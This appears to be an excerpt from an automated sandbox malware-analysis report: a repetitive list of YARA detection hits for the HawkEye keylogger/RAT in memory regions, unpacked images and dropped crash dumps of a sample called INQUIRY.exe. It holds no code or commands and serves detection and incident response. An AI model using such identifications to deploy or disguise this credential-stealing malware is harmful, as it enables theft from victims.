                    Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
